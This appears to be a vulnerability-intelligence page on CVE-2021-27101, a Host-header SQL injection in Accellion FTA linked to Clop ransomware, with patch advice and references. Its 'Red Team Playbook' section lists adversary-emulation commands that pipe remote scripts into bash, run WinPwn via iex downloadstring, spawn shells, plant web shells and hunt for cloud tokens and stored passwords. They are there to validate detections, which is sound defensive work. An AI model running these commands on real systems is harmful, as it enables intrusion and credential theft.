CVE-2021-27101
Overview
This vulnerability is a SQL injection flaw rooted in improper sanitization of the Host header within HTTP requests processed by the Accellion FTA web application. The affected component is the document_root.html endpoint, which fails to validate or parameterize input from the Host header, allowing crafted input to be interpreted as executable SQL commands against the backend database.
Vulnerability Description
Accellion FTA 9_12_370 and earlier is affected by SQL injection via a crafted Host header in a request to document_root.html. The fixed version is FTA_9_12_380 and later.
Impact
An unauthenticated attacker can exploit this flaw remotely by sending crafted HTTP requests to the affected server, enabling arbitrary SQL command execution on the backend database. This may result in unauthorized access to sensitive data, modification or deletion of database records, and potential full compromise of the application’s data store. The vulnerability can lead to data breaches, disruption of service, and lateral movement within the affected environment due to compromised database integrity and confidentiality.
Solution
Upgrade Accellion FTA to version 9_12_380 or later, as this version includes the fix for the SQL injection vulnerability in the Host header processing. Detailed patch instructions and version information are available on the vendor’s official product page at https://www.accellion.com/products/fta/. No alternative workarounds are documented; applying the vendor-provided update is required to remediate this issue.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Confirmed Groups
| Group | Victims | Source |
|---|---|---|
|
clop
|
1254 | ransomware.live |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in Accellion's File Transfer Appliance (FTA) arises from an SQL injection flaw that can be exploited through a specially crafted Host header in requests directed at the document_root.html file. This weakness allows an attacker to manipulate SQL queries executed by the application, potentially leading to unauthorized access to sensitive data stored in the database. The flaw is particularly concerning due to its high CVSS score of 9.8, indicating a critical level of severity. The affected versions, specifically FTA 9_12_370 and earlier, lack adequate input validation mechanisms, making them susceptible to injection attacks that can compromise the integrity and confidentiality of the data.
Attack vectors for this vulnerability primarily involve sending crafted HTTP requests with malicious Host headers. An attacker can leverage this weakness to execute arbitrary SQL commands, which may result in data leakage, data modification, or even complete database takeover. Exploitation scenarios could include an attacker targeting a vulnerable instance of the Accellion FTA to extract user credentials, financial records, or other sensitive information. Moreover, the ability to manipulate the database could lead to the insertion of malicious payloads, potentially facilitating further attacks within the network or against other connected systems.
The real-world impact of this vulnerability is significant, particularly for organizations relying on the Accellion FTA for secure file transfers. Successful exploitation can lead to severe business risks, including data breaches that may result in regulatory fines, reputational damage, and loss of customer trust. The potential for sensitive information exposure is particularly alarming in industries such as healthcare, finance, and government, where data protection is paramount. Additionally, the operational disruption caused by a breach could lead to costly remediation efforts, further compounding the financial implications for affected organizations.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating to the fixed version of the Accellion FTA is crucial, as it addresses the SQL injection flaw and enhances overall security posture. Furthermore, organizations should conduct thorough security assessments and penetration testing to identify any existing vulnerabilities in their systems. Employing web application firewalls (WAFs) can also help filter out malicious requests before they reach the application layer. Additionally, monitoring logs for unusual activity, such as unexpected database queries or access patterns, can aid in early detection of potential exploitation attempts.
In conclusion, the SQL injection vulnerability in Accellion's FTA represents a critical threat that can have far-reaching consequences for organizations that utilize this file transfer solution. Understanding the technical details, potential attack vectors, and real-world implications of this vulnerability is essential for cybersecurity professionals tasked with protecting sensitive data. By adopting proactive detection and mitigation strategies, organizations can significantly reduce their risk exposure and safeguard their assets against exploitation.
CSURFACE threat intelligence has identified a marked escalation in the Exploit Prediction Scoring System (EPSS) score for CVE-2021-27101, reflecting a substantial increase in the likelihood of exploitation. The EPSS score surged by over sixfold, placing this vulnerability in the upper percentile of risk based on recent trends. This rapid increase correlates with intensified ransomware activity, particularly involving the Clop group, which continues to leverage this SQL injection flaw in their campaigns. Although no new technical exploit details have emerged, the significant rise in EPSS and ransomware associations signals heightened adversary interest and operational use. For defenders, this development underscores an elevated threat environment where exploitation attempts are becoming more frequent and potentially more effective. Consequently, the overall risk posture for organizations running affected Accellion FTA versions has shifted to a higher criticality level, warranting increased vigilance in monitoring and incident response efforts.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Accellion | Fta | All |
cpe:2.3:a:accellion:fta:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Ransomware Groups 1
Threat Feed
5 eventsRansomware group known to exploit this vulnerability. Tools: Cobalt Strike, PowerShell Empire, TinyMet (1254 known victims)
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Cobalt Strike, PowerShell Empire, TinyMet (1254 known victims)
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-27101 |
| accellion.com |
GitHub CVE
x_refsource_MISC
|
https://www.accellion.com/products/fta/ |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/accellion/CVEs/blob/main/CVE-2021-27101.txt |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-27101 |